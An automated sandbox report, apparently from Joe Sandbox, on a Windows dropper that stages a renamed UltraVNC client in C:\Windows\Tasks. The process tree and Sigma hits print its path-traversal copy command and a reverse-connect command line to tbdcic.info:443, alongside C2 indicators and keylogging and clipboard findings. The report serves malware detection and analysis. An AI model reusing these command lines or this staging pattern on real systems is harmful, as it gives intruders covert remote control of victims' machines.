Edit tour

Windows Analysis Report
7q551ugrWe.exe

Overview

General Information

Sample name:	7q551ugrWe.exe renamed because original name is a hash value
Original sample name:	c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
Analysis ID:	1579876
MD5:	d61940626fad051067bfd16f2ab4e657
SHA1:	cceaeda73fca724016bac0c9cb000fcd4ca1e523
SHA256:	c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
Tags:	exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Multi AV Scanner detection for submitted file

Yara detected UltraVNC Hacktool

AI detected suspicious sample

Contains VNC / remote desktop functionality (version string found)

Contains functionality to register a low level keyboard hook

Drops executables to the windows directory (C:\Windows) and starts them

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Suspicious UltraVNC Execution

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Process Start Locations

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

7q551ugrWe.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\7q551ugrWe.exe" MD5: D61940626FAD051067BFD16F2AB4E657)

cmd.exe (PID: 7496 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7556 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7612 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7664 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

Acrobat.exe (PID: 7732 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7928 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 8144 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

timeout.exe (PID: 7748 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 7948 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7172 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 3892 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 5624 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

sync_browser.exe (PID: 2624 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 2284 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

sync_browser.exe (PID: 3636 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 1528 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 5096 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7580 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 5916 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 2284 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 5756 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Windows\Tasks\sync_browser.exe	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Windows\Tasks\WPSela.LSZr7V	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000019.00000000.1534448012.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: 7q551ugrWe.exe PID: 7404	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: sync_browser.exe PID: 2624	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: sync_browser.exe PID: 3636	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
22.0.sync_browser.exe.7ff67e7c0000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
25.0.sync_browser.exe.7ff67e7c0000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
22.2.sync_browser.exe.7ff67e7c0000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
25.2.sync_browser.exe.7ff67e7c0000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7612, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2624, ProcessName: sync_browser.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7612, TargetFilename: C:\Windows\Tasks\conhost.exe

Sigma detected: Suspicious UltraVNC Execution

Source: Process started

Author: Bhabesh Raj: Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7612, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, ProcessId: 3636, ProcessName: sync_browser.exe

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Source: Process started

Author: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 7404, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7496, ProcessName: cmd.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 7404, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7496, ProcessName: cmd.exe

Sigma detected: Suspicious Process Start Locations

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7612, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 2624, ProcessName: sync_browser.exe

Suricata Signatures

ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T13:41:06.611036+0100	2035893	1	Malware Command and Control Activity Detected	192.168.2.9	49930	194.190.152.201	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 7q551ugrWe.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.2% probability

Source: 7q551ugrWe.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
Source:	Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	22_2_00007FF67E7C5910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	22_2_00007FF67E7E6DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	22_2_00007FF67E7EC210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	22_2_00007FF67E87A228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	25_2_00007FF67E7C5910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	25_2_00007FF67E7E6DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	25_2_00007FF67E7EC210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	25_2_00007FF67E87A228

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,

22_2_00007FF67E7E6DD1

Source: Joe Sandbox View

IP Address: 194.190.152.201 194.190.152.201

Source: Network traffic

Suricata IDS: 2035893 - Severity 1 - ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon : 192.168.2.9:49930 -> 194.190.152.201:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E82D890 EnterCriticalSection,LeaveCriticalSection,recv,WSAGetLastError,WSAGetLastError,LeaveCriticalSection,recv,WSAGetLastError,

22_2_00007FF67E82D890

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: tbdcic.info

Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://forum.uvnc.com
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 7q551ugrWe.exe, 00000000.00000003.1349858008.0000000000999000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002969000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://www.uvnc.com
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr	String found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
Source: 2D85F72862B55C4EADD9E66E06947F3D0.11.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: ReaderMessages.9.dr	String found in binary or memory: https://www.adobe.co

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,00000000

0_2_00408630

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,

22_2_00007FF67E7C1DD0

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	22_2_00007FF67E7C1DD0
